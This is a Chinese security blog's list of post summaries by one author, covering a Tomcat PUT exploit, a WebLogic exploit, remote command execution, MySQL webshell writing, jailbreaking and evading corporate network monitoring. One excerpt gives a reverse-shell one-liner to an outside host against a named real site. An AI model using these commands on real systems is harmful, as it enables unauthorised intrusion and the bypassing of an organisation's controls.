摘要: 程序名称:tomcat put上传漏洞利用程序v1.1,tomcat_put.py程序作者:pt007@vip.sina.com漏洞编号:CVE-2017-12615影响平台:Windows&Linux影响版本:Apache Tomcat 7.0.0 - 7.0.81程序用法:tomcat1.txt 阅读全文
posted @ 2019-11-14 18:59 pt007 阅读(746) 评论(0) 推荐(0) 编辑
摘要: 文章作者:pt007@vip.sina.comios10.3.3快速越狱指南:(1)进入爱思助手->刷机越狱->一键越狱: (2)安装并使用Shadowrocket配置socket5 VPN,然后Cydia就正常显示。192.168.1.158:1080(socket5代理)(3)进入cydia,更 阅读全文
posted @ 2019-11-14 18:57 pt007 阅读(2013) 评论(0) 推荐(0) 编辑
摘要: Android应用可能会使用sockets(TCP、UDP、UNIX)在应用间或者自身应用组件间进行通信,然而这种通信方式本身并没有提供任何身份认证。● 当开放端口绑定到0.0.0.0,那么任何IP都可以访问。● 当开放端口绑定到127.0.0.1,那么同一设备上的应用依然可以访问。一旦端口访问身份 阅读全文
posted @ 2019-11-14 18:54 pt007 阅读(643) 评论(0) 推荐(0) 编辑
摘要: https://github.com/nabla-c0d3/ssl-kill-switch2 //下载deb文件到本地通过爱思助手上传到iphone手机上面将手机连接电脑打开爱思助手--文件--文件系统(越狱)--路径:/var/root/Media/Cydia/AutoInstall(将deb格式 阅读全文
posted @ 2019-11-14 18:49 pt007 阅读(2614) 评论(0) 推荐(0) 编辑
摘要: //下面是关于各端口的说明和利用方法汇总: 25 //smtp (可尝试暴破,邮件伪造,vrfy/expn查询用户信息,使用stmp-user-enum工具自动跑) 110 //pop3 (可尝试暴破,明文密码,可以嗅探和arp欺骗来获取) 53 //dns域名解析 (允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控) 111/1025/2049 //NFS网络文件系统(配置... 阅读全文
posted @ 2019-11-14 18:48 pt007 阅读(1029) 评论(0) 推荐(0) 编辑
摘要: 公司的一个渗透测试项目中发现使用了LDAP服务(389)做为用户认证的后台数据库,写了一个ldap匿名访问批量检测脚本 ldap2018.py: 阅读全文
posted @ 2019-11-14 18:45 pt007 阅读(996) 评论(0) 推荐(0) 编辑
摘要: 一、远程执行命令方式及对应端口:  IPC$+AT 445  PSEXEC 445  WMI 135  Winrm 5985(HTTP)&5986(HTTPS) 二、9种远程执行cmd命令的方法: 1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user 阅读全文
posted @ 2019-11-14 14:51 pt007 阅读(23499) 评论(0) 推荐(1) 编辑
摘要: 1、指定参数base64加密替换功能插件:D:\plug_in\base64encode.py 2、为何要开发这个插件?参考:D:\plug_in\header包头数据自动替换插件\test1.py测试禅道的一个order by注入,发现提交的参数先使用base64加密后提交,由于是高版本mysql 阅读全文
posted @ 2019-11-14 14:45 pt007 阅读(1539) 评论(0) 推荐(0) 编辑
摘要: 1、 配置tomcat启动jconsole到1099端口的配置:参考文章:https://www.cnblogs.com/baihuitestsoftware/articles/6405580.html //可以将其设置为无密码访问: cd /opt/apache-tomcat-8.0.3/bin 阅读全文
posted @ 2019-11-14 14:43 pt007 阅读(1318) 评论(0) 推荐(0) 编辑
摘要: 文章作者:pt007@vip.sina.com1、前置知识:大家在渗透测试的时候经常会遇到时间戳(timestamp),时间戳用于防范burpsuite的抓包重放攻击,难倒了不少工具黑客,但是遇到代码级的黑客会如何解决这个问题呢?一言不合上代码,先给出生成时间戳的python代码: #!/user/ 阅读全文
posted @ 2019-11-14 14:38 pt007 阅读(857) 评论(0) 推荐(0) 编辑
摘要: 在渗透测试的时候,我们使用into outfile快速写入一句话后门时经常会出现写入不了的情况:update mysql.user set file_priv='Y' where user='root';flush privileges;select concat("'",0x3C3F7068702 阅读全文
posted @ 2019-11-14 14:26 pt007 阅读(1860) 评论(0) 推荐(0) 编辑
摘要: 发出来给安全的兄弟们批量检测使用,运行时截图: #coding=utf-8 import socket import time import re,os,sys,codecs type = 'utf-8' reload(sys) sys.setdefaultencoding(type) IpFile 阅读全文
posted @ 2019-11-14 14:25 pt007 阅读(1023) 评论(0) 推荐(0) 编辑
摘要: //linux版本执行反弹一句话: CVE-2017-10271_linux.py http://www.sohu.com:80/ /bin/sh -i >/dev/tcp/210.73.xx.1/8000 0<&1 2>&1 //win版本的利用方式: 我给个提示,下载exe程序,反弹一个cmds 阅读全文
posted @ 2019-11-14 14:23 pt007 阅读(225) 评论(0) 推荐(0) 编辑
摘要: 1、事件过程: 下面是9.26日出现断网事件的告警邮件内容,日期和时间加红:【事件告警】一级事件 北京XXx机房网络故障 事件 (1)业务影响开始时间:2018-9-26 15:50 (2)预计解决时间:未知 (3)影响范围:大数据,云平台业务,以及各产业应用,在线设备大范围掉线 (4)级别:一级 阅读全文
posted @ 2019-11-14 14:09 pt007 阅读(628) 评论(0) 推荐(1) 编辑
摘要: 文章作者:pt007@vip.sina.com 使用场景: 公司最近不知什么原因又开始折腾员工了,微信、QQ、百度网盘等等软件统统不让用了,公司在出口的地方通过部署了安全监控系统来实现上述功能,当我们使用不加密的socks5软件连接公网VPS的时候,会识别出正在使用socks5协议,然后的操作挺常规 阅读全文
posted @ 2019-11-14 14:06 pt007 阅读(7482) 评论(1) 推荐(0) 编辑